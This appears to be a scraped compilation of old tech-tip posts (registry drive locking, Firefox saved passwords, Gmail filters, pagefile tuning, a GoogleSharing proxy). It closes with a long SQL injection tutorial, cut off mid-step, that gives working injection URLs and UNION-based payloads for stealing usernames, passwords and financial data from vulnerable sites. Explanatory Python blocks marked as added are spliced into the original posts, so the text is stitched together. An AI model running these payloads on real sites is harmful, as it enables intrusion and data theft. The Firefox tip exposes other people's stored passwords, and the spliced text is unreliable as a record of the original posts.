We don’t usually prefer to lock our drives, but sometimes it becomes necessary. Say, for instance, you have stored your office documents in D:\ and you don’t want your kids to access them; in such a case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive), since root drives are not intended to be locked because they are mandatory for the system and application programs.

    * Start & Run and type Regedit to open Registry editor

    * Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

    * Create a new DWORD value NoViewOnDrive and set its value as

2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 - 26
Alpha values

A =>> 1
B =>> 2
C =>> 3
D =>> 4
E =>> 5
F =>> 6
G =>> 7
H =>> 8
I =>> 9
J =>> 10
K =>> 11
L =>> 12
M =>> 13
N =>> 14
O =>> 15
P =>> 16
Q =>> 17
R =>> 18
S =>> 19
T =>> 20
U =>> 21
V =>> 22
W =>> 23
X =>> 24
Y =>> 25
Z =>> 26

For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)

    * To lock more drives, calculate the value of each drive and then set sum of those numbers as value

    * To unlock your drive just delete the key from the registry.
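The NoDrives table in "Hiding A Drive" and the 2^(n-1) rule here describe the same bitmask: bit 0 is A:, bit 1 is B:, and so on up to Z:. The following is an added example, not part of the original posts, that builds the value from drive letters and decodes the values found in a .reg export back into letters; the function names and the sample export are constructed for illustration.

```python
import string

ALL_DRIVES_MASK = (1 << 26) - 1  # 67108863, the "All" value in the table
POLICIES = ("NoDrives", "NoViewOnDrive")


def drives_to_mask(letters):
    """Sum 2^(alpha number - 1) over the given drive letters."""
    mask = 0
    for raw in letters:
        letter = raw.strip().rstrip(":\\").upper()
        if len(letter) != 1 or letter not in string.ascii_uppercase:
            raise ValueError(f"not a drive letter: {raw!r}")
        mask |= 1 << (ord(letter) - ord("A"))
    return mask


def mask_to_drives(value):
    """List the drive letters whose bit is set in a policy value."""
    if not 0 <= value <= ALL_DRIVES_MASK:
        raise ValueError(f"value outside the 26-drive range: {value}")
    return [chr(ord("A") + bit) for bit in range(26) if (value >> bit) & 1]


def parse_reg_dword(text):
    """Convert 'dword:00000010' as written in a .reg file to an integer."""
    prefix, _, digits = text.strip().partition(":")
    if prefix.lower() != "dword" or len(digits) != 8:
        raise ValueError(f"not a REG_DWORD entry: {text!r}")
    return int(digits, 16)


def audit(reg_text):
    """Map each drive policy found in a .reg export to the drives it affects."""
    found = {}
    for line in reg_text.splitlines():
        name, sep, data = line.strip().partition("=")
        name = name.strip('"')
        if sep and name in POLICIES:
            found[name] = mask_to_drives(parse_reg_dword(data))
    return found


# Constructed sample export of the Policies\Explorer key (not from a real system).
SAMPLE_EXPORT = r"""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:00000010
"NoViewOnDrive"=dword:0000000c
"""

if __name__ == "__main__":
    print("E: ->", drives_to_mask(["E"]))
    print("C: + D: ->", drives_to_mask(["C:", "D:\\"]))
    for policy, drives in audit(SAMPLE_EXPORT).items():
        print(policy, "applies to", ", ".join(d + ":" for d in drives))
```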

view passwords saved in your pc?

First, you need to have Mozilla Firefox.
Now open Mozilla Firefox, click on Tools, then select Options.
A dialogue box appears. In it, click on Security, then double-click on Saved Passwords, and then click on Show Passwords.
That's all: you can see the saved passwords along with the IDs.

USING FILTERS IN GMAIL ?



Gmail's filters allow you to manage the flow of incoming messages. Using filters, you can automatically label, archive, delete, star, or forward your mail, even keep it out of Spam -- all based on a combination of keywords, sender, recipients, and more.

To create a filter:

   1. Click Create a filter (next to the Search the Web button at the top of any Gmail page).
   2. Enter your filter criteria in the appropriate field(s).
   3. Click Test Search to see which messages currently in Gmail match your filter terms. You can update your criteria and run another test search, or click Next Step.
   4. Select one or more actions from the list. These actions will be applied to messages matching your filter criteria in the order in which the actions are listed -- for example, you could choose to Forward matching messages to a specific email address, then Delete the messages. Note that if you choose to forward messages to another address, you'll need to first verify that you own any new forwarding addresses.
   5. If you'd like to apply this filter to messages already in Gmail, select the Also apply filter to x conversations below checkbox.
   6. Click Create Filter.

Please note: When you create a filter to forward messages, only new messages will be affected. Any existing messages that the filter applies to will not be forwarded.

To create a filter from within a message:

   1. Click the drop-down menu next to Reply.
   2. Select Filter messages like this.
   3. Enter your filter criteria in the appropriate field(s).

To edit or delete existing filters:

   1. Click Settings (at the top-right of any Gmail page).
   2. Click Filters.
   3. Find the filter you'd like to change and click its edit link, or click delete to remove the filter.
   4. If you're editing the filter, enter the updated criteria for the filter in the appropriate fields, and click Next Step.
   5. Update any actions and click Update Filter.

You can create an unlimited number of filters, but only 20 filters can forward to other addresses. You can maximize your filtered forwarding by combining filters that send to the same address.

optimizing windoz pagefile ?



Optimizing Windows pagefile

    The page file (virtual memory) is the part of your hard drive that the Operating System uses as though it were main memory. The OS uses virtual memory when the physical memory cannot hold the data that applications require. Since hard drives are much slower than RAM, accessing data from virtual memory is slower and there is naturally a significant effect on system performance. Moreover, Windows XP uses the virtual memory all the time, regardless of free physical memory, so optimization of the page file is essential for a faster system.

    There are two important aspects to the page file -its size and its location.

    Page File size

    Windows XP uses the page file dynamically, that is the page file grows or shrinks according to need. The page file is often given a minimum value and a maximum value, where the minimum value defines the guaranteed space allocated to the page file and the maximum value defines the limit to which the page file can grow. With a maximum and minimum value set, Windows XP has to resize the page file on the fly. Setting the maximum and minimum value to the same number results in more efficient handling of the page file, since Win XP won’t have to waste time resizing the page file.
    Setting the size of the page file

    Go to the ‘System Properties’ page. Here, go to the ‘Advanced’ tab and then select ‘Settings’ under ‘Performance’. In the window that opens, go to the ‘Advanced’ tab; towards the bottom of the tab, you will find ‘Virtual memory settings’. Click ‘Change’.

    In the next window that opens, you can select the drive on which you want the page file to reside; by default, the page file resides on the C: drive. You can also see the page file size. To change it, click on ‘Custom Size’ and then key in the initial and maximum sizes to be the same. Typically, 1 GB of page file is more than enough for most users, so key in ‘1024’ as your initial and maximum page file size.

    Page File Location

    Keeping the page file on the same drive as the Operating System is not advised, as the page file requires intermittent read and write cycles that can significantly affect the performance of the system. Those who have only one drive can place the page file on a non OS partition.

    Once in the virtual memory settings you can see all your partitions listed in the box. Select the drive on which to enable the page file, then select ‘Custom Size’, and key in ‘1024’ as your initial and maximum page file size.

Are You Sure Your Password is Safe?



Since the appearance of computers and the necessity of storing confidential information, passwords became part of our lives. But password hacking programs also appeared, ready to offer a solution for those hackers who were stopped by this barrier. At first, these programs were distributed between certain underground hacker groups.

    But when the internet appeared, anyone could find programs for password hacking; password hackers popularized a few programs and soon it became mainstream among the computer community. Any user can insert the keywords 'how to hack a password' in any search engine and he will find tons of information that can help him.
Passwords and How to Obtain Them
A password is a combination of characters that a user uses for protecting information. Once a file or a determined section of a hard disk is protected by a password, only those that know it can access it. Although passwords have existed for thousands of years, they have adapted perfectly to the computer era.

        If you consider how much money you can make for knowing the correct combination of characters of a determined portal, then it is no wonder that password hackers proliferated.
How Hacking Of Passwords Is Achieved
Password hacks can be performed in several ways. The most commonly used tool is social engineering. Social engineering consists of making a user believe that he is giving confidential information to a trusted party. For example, a cracker could pose as a system administrator from another country and ask for some personal information that could be considered irrelevant by the user. It's quite probable that that information was the last piece of the puzzle required by the cracker for acquiring the password of the user.

Another way of hacking passwords is through a hash function. A hash function is a program that transforms a determined password into a fixed length string. For example, if you have the password foxtrot1256, the hash function will transform it into a key, something like DG65HKSDLK43545SSDFEE232AQQQ10. Some programs use determined artifices for finding the password hidden inside the key.

Since computing power increased, the brute force attack became another choice for cracking passwords. How does it work? Well, it basically tests different kinds of character combinations until it finds the correct one. The problem with this method is that if the password is too long, then the brute force attack won't prosper, at least during a reasonable span of time. In this kind of situation, it is better to use social engineering to find out the password.

Adobe warns against third party patches ?



Adobe warns against third party patches

Earlier this month, Adobe warned users about yet another security vulnerability in Acrobat – but then they issued another warning, cautioning users against installing “fixes” issued by third parties such as the one from security company RamzAfzar. Because it was out there before the release of the official patch from Adobe, many users and IT pros might consider installing it to get immediate protection, but it’s important to realize that third party patches aren’t going to be supported by Adobe, and may possibly cause more problems than they solve. In the meantime, one solution is to use an alternative PDF program. Read more here:

http://www.pcworld.com/article/205603/adobe_warns_acrobat_users_dont_install_thirdparty_security_patch.html

Google Sharing ?

GoogleSharing is a special kind of anonymizing proxy service, designed for a very specific threat. It ultimately aims to provide a level of anonymity that will prevent Google from tracking your searches, movements, and what websites you visit. GoogleSharing is not a full proxy service designed to anonymize all your traffic, but rather something designed exclusively for your communication with Google. Our system is totally transparent, with no special "alternative" websites to visit. Your normal work flow should be exactly the same.
The Basic Problem

Google thrives where privacy does not. If you're like most internet users, Google knows more about you than you might be comfortable with. Whether you were logged in to a Google account or not, they know everything you've ever searched for, what search results you clicked on, what news you read, and every place you've ever gotten directions to. Most of the time, thanks to things like Google Analytics, they even know which websites you visited that you didn't reach through Google. If you use Gmail, they know the content of every email you've ever sent or received, whether you've deleted it or not.

They know who your friends are, where you live, where you work, and where you spend your free time. They know about your health, your love life, and your political leanings. These days they are even branching out into collecting your realtime GPS location and your DNS lookups. In short, not only do they know a lot about what you're doing, they also have significant insight into what you're thinking.

Where GoogleSharing Comes In

GoogleSharing is a system that mixes the requests of many different users together, such that Google is not capable of telling what is coming from whom. GoogleSharing aims to do a few very specific things:

   1. Provide a system that will prevent Google from collecting information about you from services which don't require a login.
   2. Make this system completely transparent to the user. No special websites, no change to your work flow.
   3. Leave your non-Google traffic completely untouched, unredirected, and unaffected.

The GoogleSharing system consists of a custom proxy and a Firefox Addon. The proxy works by generating a pool of GoogleSharing "identities," each of which contains a cookie issued by Google and an arbitrary User-Agent for one of several popular browsers. The Firefox Addon watches for requests to Google services from your browser, and when enabled will transparently redirect all of them (except for things like Gmail) to a GoogleSharing proxy. There your request is stripped of all identifying information and replaced with the information from a GoogleSharing identity.

This "GoogleShared" request is then forwarded on to Google, and the response is proxied back to you. Your next request will get a different identity, and the one you were using before will be assigned to someone else. By "sharing" these identities, all of our traffic gets mixed together and is very difficult to analyze.

The GoogleSharing proxy even constantly injects false but plausible search requests through all the identities.

The result is that you can transparently use Google search, images, maps, products, news, etc... without Google being able to track you by IP address, Cookie, or any other identifying HTTP headers. And only your Google traffic is redirected. Everything else from your browser goes directly to its destination.
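The identity sharing described above, as an added simplified model that is not the googleshare server or addon code: the addon-side decision about which hosts to redirect, and the proxy-side swap of the client's identifying headers for a pooled identity. The hostnames, the list of headers treated as identifying, and the sample identities are constructed assumptions.

```python
from collections import deque

# Hostnames are assumptions; the page names the services (Mail, Docs, ...) only.
NEVER_PROXIED = {"mail.google.com", "docs.google.com", "sites.google.com"}
# Headers treated as identifying in this model (an assumption).
IDENTIFYING = {"cookie", "user-agent", "referer", "authorization", "x-forwarded-for"}

# Constructed sample identities: a Google-issued cookie plus a User-Agent.
SAMPLE_IDENTITIES = [
    {"cookie": "PREF=ID=constructed-1", "user_agent": "Mozilla/5.0 (sample one)"},
    {"cookie": "PREF=ID=constructed-2", "user_agent": "Mozilla/5.0 (sample two)"},
    {"cookie": "PREF=ID=constructed-3", "user_agent": "Opera/9.80 (sample three)"},
]


def should_redirect(host, user_excluded=()):
    """Addon side: only Google hosts go to the proxy, minus the exclusions."""
    host = host.lower().rstrip(".")
    is_google = host == "google.com" or host.endswith(".google.com")
    return is_google and host not in NEVER_PROXIED and host not in user_excluded


class IdentityPool:
    """Proxy side: hand each request the next identity, then recycle it."""

    def __init__(self, identities):
        if len(identities) < 2:
            raise ValueError("sharing needs at least two identities")
        self._free = deque(identities)

    def share(self, request):
        identity = self._free.popleft()
        try:
            # Drop everything that identifies the client, keep the rest.
            headers = {name: value for name, value in request["headers"].items()
                       if name.lower() not in IDENTIFYING}
            headers["Cookie"] = identity["cookie"]
            headers["User-Agent"] = identity["user_agent"]
            # The client's address is not copied into the outgoing request.
            return {"host": request["host"], "path": request["path"],
                    "headers": headers}
        finally:
            # Back of the queue: the next request gets a different identity
            # and this one becomes available to another user.
            self._free.append(identity)


if __name__ == "__main__":
    pool = IdentityPool(SAMPLE_IDENTITIES)
    req = {"host": "www.google.com", "path": "/search?q=test",
           "client_ip": "192.0.2.10",
           "headers": {"Cookie": "PREF=ID=alice", "Accept-Language": "en"}}
    if should_redirect(req["host"]):
        print(pool.share(req))
        print(pool.share(req))
```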
GoogleSharing Transport

Where Google has failed to provide universal HTTPS support, we have. All requests to a GoogleSharing proxy are sent via HTTPS. These eventually have to be proxied out as HTTP from GoogleSharing to Google, but your traffic is encrypted on the first path.
Running A GoogleSharing Proxy

We've made the proxy code available so that anyone can run a GoogleSharing proxy instance in addition to the one that we're running.


The basic GoogleSharing install is fairly straightforward:

   1. Download the GoogleSharing Firefox Addon.
   2. Restart Firefox.
   3. You are now browsing with GoogleSharing! All of the appropriate Google traffic will be redirected through a GoogleSharing proxy.
   4. By default, GoogleSharing is enabled. To toggle the GoogleSharing status, simply left-click on the green text that says "GoogleSharing Enabled" in the bottom right hand corner of your browser window.
   5. Should you feel the urge,

Customizing Your Settings
Each GoogleSharing proxy you have configured can be customized with your language preferences, services to exclude, and transport requirements.

   1. Right-click on the "GoogleSharing Enabled/Disabled" text in the bottom right hand corner of your browser window, and select "Options".
   2. Select the GoogleSharing proxy you would like to configure (by default there is only one, the proxy we run at proxy.googlesharing.net), and click "Edit Proxy".
   3. If there are services that you would not like to anonymize with GoogleSharing, you can select the ones you would like to exclude under "Do not proxy the following services." Note that this is in addition to the services that GoogleSharing will never proxy, such as Mail, Checkout, Health, Sites, Docs, and Reader.
   4. If you would like the Google interface language to be something other than English, you can select the language of your choice under "Google Interface Language."
   5. If you would like to restrict the languages that appear in your search results, you can select all of those that you'd like to accept.
   6. If you don't care about your traffic between your browser and the GoogleSharing proxy being SSL protected, you can unselect "Use SSL" for a slight speedup.

Changing The Default Proxy
If someone else starts running a GoogleSharing proxy that you would prefer to use, simply right-click on the GoogleSharing status in the bottom right of your browser window, and select "Options." Here you can add new GoogleSharing proxies and configure which GoogleSharing proxy is currently enabled.

Running Your Own Proxy
If you have access to some server resources and would like to run a public GoogleSharing proxy, you can download the server here: googleshare v0.14

To install the proxy:

    * wget http://www.googlesharing.net/server/googleshare-0.14.tar.gz
    * sudo apt-get install python-twisted-web python-openssl python-psyco
    * tar zxvf googleshare-0.14.tar.gz
    * cd googleshare-0.14
    * sudo python setup.py install

To run the proxy on SSL port 443 and HTTP port 80:

    * sudo googleshare -c <sslCertificateLocation> -k <sslKeyLocation> -s 443 -p 80

The proxy will drop privileges once it has bound to specified ports and opened its log file.

To stop the proxy, send it SIGINT (kill -2 <pid>) and it will save its identity state, which will automatically be restored the next time the proxy starts. Sending the proxy SIGKILL (kill -9 <pid>) will not give it the chance to save state.


Source: http://www.googlesharing.net/download.html

MySQL Injection Ultimate Tutorial ?

Section 1 - Intro to Basic Database Information

Section 2 – Steps to injections

1)Find out how to close the previous statement & find the right comment to use to end the injection

2)Check for magic quotes

3)Check to see if UNION works

4)Find the number of columns

5)Craft a union statement that doesnt cause an error and see which columns are outputted

6)Check the mysql version to see if information_schema is present

7)Get the desired column and table names

8)Get your data


In Part 2: (not done yet)

Section 1 – Advanced injections

1)Check for load_file()

2)Check for into outfile

3)Ddos the mysql server

4)login page injections

5)Possible failures - multi selects

6)Get past magic quotes - where, concat - no load_file

7)The no spaces bug

8)Getting past filters

9)Blind Injection

10)Advanced NOT IN


Before we start anything about inserting SQL commands and stealing data from columns and tables, we need to discuss the basics and all the terms that will be necessary for fully comprehending this paper. So lets begin this with some basic Database Server Info. By the end of this section you should fully understand the basics of databases and how they function on a user interaction level.
Section 1: Basic Database Information

Database (DB) servers are servers that hold information. Information is stored in a type of holder called a database, which is a certain section of the database server that serves as a structured container, storing data in fully organized subsections that enable the quick and efficient withdrawal or insertion of data.

DB Servers can have many databases, each with a different use, such as web, which may hold content displayed or needed for the correct display of webpages open to the public, or intranet, which may include information needed by employees on the inside network of the company, etc. There are many types of database servers, but all are similar, with few differences. Some common types are:

1)Mysql
2)MsSQL (Microsoft SQL Server)

3)Oracle

4)Microsoft Access

5)Postgre SQL

etc..

In this tutorial we will discuss one of the two most common, MySql (the other most common is MsSQL, then after that Microsoft Access).

DB's are made up of tables, each of which holds a similar type of data such as user info or articles. Tables are made up of columns, which group the data into different types such as usernames, passwords, dates registered, etc. The actual data in a table is in rows, which are inserted into the database and have info for each column in the table - e.g. a username, password, etc.


Now, to access data from the server you would use SQL - Structured Query Language. This is similar to programming languages in that it has its own set of functions, operators, and syntax. This lets you select certain data that you want and choose the database, table, and columns that you want to access the rows in.

SQL has a set format for selecting data from the database. It looks like this:

SELECT column1,column2 FROM table

This is basically saying to go to table “table” and get the data stored in columns “column1” and “column2” for all the rows (since the number is not specified, it takes them all. I'll show you how to specify how many next).

But what if you only wanted two rows? Yes, you could still retrieve all the rows then sort it out with commands in php, but that’s inefficient. Say you wanted the FIRST 2 usernames & passwords from table users of database webinfo (for injections you usually dont have to put the database, its already selected in the code). You would use

Select column_name FROM table_name limit start,number

column_name is the columns you want. if you want two columns, you would do column1,column2.

table_name is the table. If you want to use a table from a different database server, you would do database.table

limit start,number tells the server how many rows you want. Say you want the first 2 rows, you would make start 0 (the first row), and put number 2 for two rows. This would basically say go to the first row (0) and give me the next two rows.

If you wanted the next 2 rows after the first two (but only two, not all 4), you would make start 2 since you already got 2 and make number 2 again (limit 2,2). This would be saying go to the second row and get me the next two rows. If you wanted all four, you would make start 0 and number 4.

For injections you dont need to know how to get the data out of the query result in php/asp, which usually involve manipulating the arrays returned by the mysql query, since its already done for you in the code of the script youre trying to hack. You just need to find which columns get displayed to the page, which we will discuss later.

Now, say you want to get the password of a user whose username is "bako123". This is used for login systems to check logins. Then you would use:

Select column_name FROM table_name WHERE column_name = 'Value'

For example, if you wanted to the password column from the table users in a row where the username column is bako123 you would do:

Select password FROM users WHERE username = 'bako123'

This would let you retrieve the password of a certain user, bako123. This can be used in many ways, to retrieve a certain article, user information, a certain persons financial information, etc.

If you wanted to get the password of a user where the name was similar to bako, maybe xbako or bakos or xbakos, you would do

Select password FROM users WHERE username LIKE '%bako%'

The % is a wildcard which basically says there can be text in its place, so in this case there can be text before and after bako since there is a % before and after it.

This leads us to the final discussion in this section: Magic Quotes.

Many database servers (or scripts that access them) have magic quotes enabled. This acts on quotes like ', which are needed to specify data in statements like WHERE username = or in functions we will discuss later that load files with a certain filename. Quotes are needed to specify strings. For example, when we did WHERE username LIKE '%bako%', the quotes told the server that the string to search for was %bako%. If there were no quotes, the server wouldn’t take %bako% as a string, and not only would the search fail but the script would return an error because %bako% is out of place.

Magic Quotes prevents quotes from being used in injections by turning the ' (original quote) into either \' (backslashed quote) or '' (doubled quote).


The \' tells the sql server to take away the meaning of the ' and regard it as a normal character in a string. For example, say you wanted to select a password from a user that had a username Bako's. If you did :

Select password FROM users WHERE username = 'bako's'

the ' in bako's would end the username = value statement and make it WHERE username = 'bako'. Then the s' would be stray and cause an error.

So to specify that the ' isnt part of the SQL query syntax but just a normal character in a string like the letter b, you can use \ to take its meaning away and make it be considered a normal character by the server.

Another way the server takes the meaning away from ' is by making it ''. Say you wanted to find a user by the name of bako's again, and you put bako's straight into the script, like

Select password FROM users WHERE username = 'bako's'

the script/server would change it to

Select password FROM users WHERE username = 'bako''s'

which would then create two different strings, bako and s, and since the s is out of place and not in a statement (like SELECT col FROM table WHERE col = value) or function it would cause an error too. There is a way to get around this in certain cases, and it will be discussed later. Now that you know basic info on mysql, time to start Injecting!!
Section 2: SQL Injecting to Steal Data

In this section we will cover each of the steps to successfully exploiting SQL Injection vulnerabilities in web scripts that use mysql. We will go step by step and cover each part thoroughly. By the time you finish this section you should fully understand how to take advantage of SQL Injection vulnerabilities and be able to successfully retrieve data such as usernames, passwords, financial information, and other assorted confidential data from databases that are used by vulnerable scripts. We'll start from the very beginning of determining if the script is vulnerable or not.

Subsection 2.1: Check for Injections

So say you find a script like this and you want to see if its vulnerable to SQL Injection:

http://site.com/script.php?id=1

In order to further demonstrate how this works, lets say you do know what query the script forms (which is usually very unlikely in real-world injections). Lets say it looks like this:

Select title,data FROM news WHERE id =

What that would do is get the title and data info from the news table in a row where the column id was 1.

So, what if we added some sql commands to the id in the url? Like this:

http://site.com/script.php?id=1'

The output depends on the script’s quality. If the script filters the input for sql keywords, or converts the id value to an integer so the keywords don’t get through, or takes any other precaution to ensure that you cant insert sql statements into the query, then no sql error would be returned, and the page will either load normally or give you a warning like “Attack Spotted, Your IP Address has been recorded” or something similar. However, if the script had no filtering whatsoever and just got the user data for id straight from the URL and inserted it right into the MySQL Query, then you would get an error like this:

"MySQL Syntax Error By '1'' In file script.php On Line 7."

Then you would know that the server does NOT filter input to make sure there are no sql commands/syntax in it and DOES NOT make sure the data is only an integer. Since you got an error, you are SURE that this is SQL Injectable!

Keep in mind that not all sites have errors as verbose as this; some sites have simple errors like “INTERNAL ERROR” or “ERROR” that reveal no useful data. However, you can be reasonably sure that its injectable. To be fully sure, move on to the next step. If all the possibilities fail in the next step, then you know chances are that’s not an sql error but some other type of error.
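The difference between the filtered and unfiltered scripts described above, as an added example (not code from the original tutorial): the same `news` lookup written with plain concatenation, with '' quote-escaping only, and with an integer cast plus a bound parameter. Python's sqlite3 stands in for PHP/MySQL, and the table rows and function names are constructed for illustration.

```python
import sqlite3

# Constructed sample data; sqlite3 stands in for MySQL so the block runs offline.
ROWS = [(1, "Launch", "public"), (2, "Draft", "unpublished"), (3, "Memo", "internal")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, data TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?, ?)", ROWS)
    return db


def run(db, sql, params=()):
    """Return the rows, or None when the server rejects the statement."""
    try:
        return db.execute(sql, params).fetchall()
    except sqlite3.Error:
        return None  # corresponds to the syntax-error page quoted above


def double_quotes(value):
    """The '' form of magic quotes described in Section 1."""
    return value.replace("'", "''")


def lookup_concat(db, raw_id):
    # No filtering: the request value is pasted inside the quotes.
    return run(db, "SELECT title, data FROM news WHERE id = '" + raw_id + "'")


def lookup_escaped_unquoted(db, raw_id):
    # Quotes are escaped, but the value sits in a numeric context with no
    # quotes around it, so input that contains no quote is still parsed as SQL.
    return run(db, "SELECT title, data FROM news WHERE id = " + double_quotes(raw_id))


def lookup_hardened(db, raw_id):
    # Convert to an integer first, then bind the value as a parameter so it
    # is never parsed as SQL text.
    try:
        news_id = int(raw_id)
    except ValueError:
        return []
    return run(db, "SELECT title, data FROM news WHERE id = ?", (news_id,))


if __name__ == "__main__":
    db = make_db()
    # Request values taken from the tutorial text.
    for value in ("1", "1'", "1' or 1=1 --", "1 or 1=1 --"):
        print(repr(value), lookup_concat(db, value),
              lookup_escaped_unquoted(db, value), lookup_hardened(db, value))
```

Quote escaping alone leaves the unquoted numeric context open, so the integer cast and the bound parameter are the part to copy into a real handler.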

Now that you have found out its injectable, lets go step by step through my MySQL Injection outline.


Subsection 2.2 - Step 1)Find out how to close the previous statement.

To do this we will use an SQL operator "and". This word lets you specify two criteria that the row must match when searching the table. For example, if you have a WHERE clause, such as

Select user from users where password = 'pass123'

and want to select data not only where the password is 'pass123' but also where the email is 'email@m.com', you would use something like this:

Select user from users where password = 'pass123' AND email = 'email@m.com'

This basically tells the server, as we had before, select the data from the user column in a row in table users where the password is pass123 AND the email also is email@m.com. If both of these criteria are not matched, then the script moves on to the next row.

Another operator like AND is OR. An example:

Select user from users where password = 'pass123' OR email = 'email@m.com'

This basically says, instead of making sure the column password is pass123 AND the email is email@m.com, it searches for rows where the password is pass123 or the email is email@m.com. Both don’t have to be present for the row to be chosen. One will do, even if the other doesn’t equal the right value.

Now say you added an and 1=1 to any statement, it would load since 1 always equals 1. This can be very useful from an attackers point of view. It can help us find out how to close the previous query AND can help us to determine if magic quotes are enabled.

Lets say you dont know the query, as you wont in most cases. The query could be anything like:

Select user from users where id = '1'

or

Select user from users where id = (1)

or
Select user from users where id = 1

etc...

In order to add more SQL commands to steal our data (***s, usernames, passwords, etc) we need to be able to end the where id = 1 (or '1', (1), etc). To do that we would have to try different possibilities until we get NO error.

In order to add our command, we would also need to know how to get rid of the other data that will come after our injection. For example, if the query was like this:

Select user from users where id = '1'

and we did http://site.com/script.php?id=1' and 1=1 (lets say magic quotes are OFF)

the query would become
Select user from users where id = '1' and 1=1 '

The stray ' after 1=1, which is left over from the '1' before we added our commands, needs to be taken care of or it will cause an error. To do this, we need to use comments to comment out the rest of the code. Two comment operators are /* and --. Sometimes one will cause an error, in that case try the other.

So lets have a full example for this first step in injections.

Say the script was, as i said before:

http://site.com/script.php?id=1

First we would check if its injectable:

http://site.com/script.php?id=1'

It gives - "Error in MySQL Syntax by '1'' in script.php on line 7."

Now you know its injectable. Now lets try to see how to end the WHERE clause.

http://site.com/script.php?id=1 or 1=1 --

This would work if there was no ' surrounding the 1, like in

SELECT title FROM news where id = 1

This gives the error - "Error in MySQL Syntax by '1' or 1=1 --' in script.php on line 7."

Remember, MySQL always surrounds the problem part in the query, in this case 1' or 1=1 --, with quotes, so don’t let the beginning and end quotes confuse you.

Even though the error shows you that 1 has a ' after it (by '1' or 1=1 --') we will pretend we didnt notice (not all sites have errors like this anyway).

So we would try next

http://site.com/script.php?id=1 or 1=1 /*

same error - "Error in MySQL Syntax by '1' or 1=1 --' in script.php on line 7."

Now lets try ending it with '. so lets do:

http://site.com/script.php?id=1' or 1=1 /*

now we get the error - "Error in MySQL Syntax by '/*'. in script.php on line 7."

This would show us that either /* isnt supported or this sql server is configured so that it needs a */ to close the comment, which would defeat the purpose of commenting out the code. But since it doesnt give us an error about the ' after id=1, we know we're close. So we try the next comment operator:

http://site.com/script.php?id=1' or 1=1 --

The page loads normally!!! Now we know we need to end the where clause with ' and add -- to the end to add our sql commands!!

Now we move on to the next step:



Subsection 2.3 - Step 2)Check for magic quotes

We know from our example before that magic quotes are off because we used ' to end the WHERE clause and it gave no error, but lets pretend our first try worked, http://site.com/script.php?id=1 or 1=1 --, so we're not sure if ' causes an error or not. We need to know if magic quotes is on because if we want to use a function like load_file to steal files (discussed later), or choose data where the user = 'admin', we need to be able to use 's, so magic quotes MUST be off.

To find out if theyre on, we would try:

http://site.com/script.php?id=1 or '1'='1' --

If you get an error like:

"Error in MySQL Syntax by '\'1\'=\'1\''. in script.php on line 7."

or
"Error in MySQL Syntax by '''1''=''1'''. in script.php on line 7."

then you would see that magic quotes are on since its adding \s or an extra ' to the ' you put in. Then you would not be able to steal files if load_file was enabled or choose certain data using WHERE ( there is a way to get around it which I will discuss later, but it doesnt work for load_file, just WHERE and other functions discussed later like concat)

Now if you get no error, you know magic_quotes are off and you have an even bigger advantage. That was easy, wasn’t it? Now lets move on.


Subsection 2.4 - Step 3)Check to see if UNION works

UNION is a function in sql that lets us select more data in a single sql statement. This can be very useful since we need to use it in order to select our own data that we want to steal from the database such as passwords or financial data. To illustrate its use further, heres an example. Say the query was:

SELECT user from users where pass = 'pass'

we could do
SELECT user from users where pass = 'pass' UNION select email from emails limit 0,1

And no error would be displayed. You don’t need to know how it helps get data to the page etc since its not needed to get the injection working.

However, in order to get the data from the UNION SELECT displayed, we would need to make sure the first select statement displays no data at all. If the first select statement does return data, it will overwrite the data from the UNION. We will discuss this later. Also, it is always good to use UNION ALL instead of just UNION; it can prevent type mismatch errors.

Now, UNION is only available in MySQL server versions above 3 (4,5,6 - 6 is the latest, but 5 is most popular). So in order to steal our data, we need to use union (well, we could use blind injection, but that's a pain in the ass), and in order to use union, the MySQL version MUST be > 3.

There is a way to check for the MySQL version without union (1 and substr(@@version,1)>3), but it's more advanced than the general tone of this tutorial at the moment (I'll go over it in a bit), so we will use an easier way. This is to try a union select and judge the error. So we could try:

http://site.com/script.php?id=1' UNION ALL SELECT 1 --

If you get an error like :

"Error in MySQL Syntax by 'UNION'. in script.php on line 7."

Then you know that the server is not understanding what UNION is since it's getting an error at the UNION keyword. If you got an error like:

"MySQL Error: Select statements must have the same number of columns in script.php on line 7."

Then you know union worked since it realizes that both selects don't have the same number of columns, therefore showing that it reads two selects, where one's the original and one is our union. Even if we got a different error such as a type conversion, as long as it's not saying an error by UNION it's OK. For some errors that just show "INTERNAL ERROR" or something similar, it's a good idea to try the next method.

So, if there aren't error messages like this, and just errors like INTERNAL ERROR, then you can use

http://site.com/script.php?id=1' and substr(@@version,1)>3 --

Substr is a function that takes a certain character from a string. @@version gives us the MySQL version in a string. So say @@version returned 4.1.33-log, substr would get the 1st letter in it (the ,1 in substr(@@version,1)), which is 4. Then it checks if 4 is greater than 3 (the >3 part). If it is, the page loads normally. If it isn't, the page will load with no data (you can get a blank page, or a page with the basic template but no actual data, e.g. no title for the news and no actual news).

Now if UNION works, we're in business! Time to move on! If not, you can use blind injection, which will be briefly discussed later in Part 2.



Subsection 2.5 - Step 4) Find the number of columns

This section will fix the error we got before: "MySQL Error: Select statements must have the same number of columns in script.php on line 7.". In order to actually use UNION to steal data, we must make union work first with no error at all so the page can load and display the stolen data.

This error occurred because the initial SELECT statement and the UNION ALL SELECT statement we injected had a different number of columns. Whenever you have UNION SELECT (or UNION ALL SELECT), the number of columns must ALWAYS match the number of columns in the first SELECT statement, or you'll get an error. For example, if the query looked like this:

Select user,pass FROM users WHERE userid = 1 UNION ALL SELECT email FROM emails

You will get that error since the first select is selecting two columns (user and pass) while the UNION ALL SELECT is selecting only one (email). So if you did

Select user,pass FROM users WHERE userid = 1 UNION ALL SELECT email,id FROM emails

There wouldn't be an error and the query would execute successfully since the first select statement is selecting two columns (user and pass) and the second select, the union all select, is also selecting two columns (email and id).

Now to get the number of columns in the first select statement, we can do two things:

1) guess the number of columns till you get it right. For example

http://site.com/script.php?id=1' UNION ALL SELECT null --

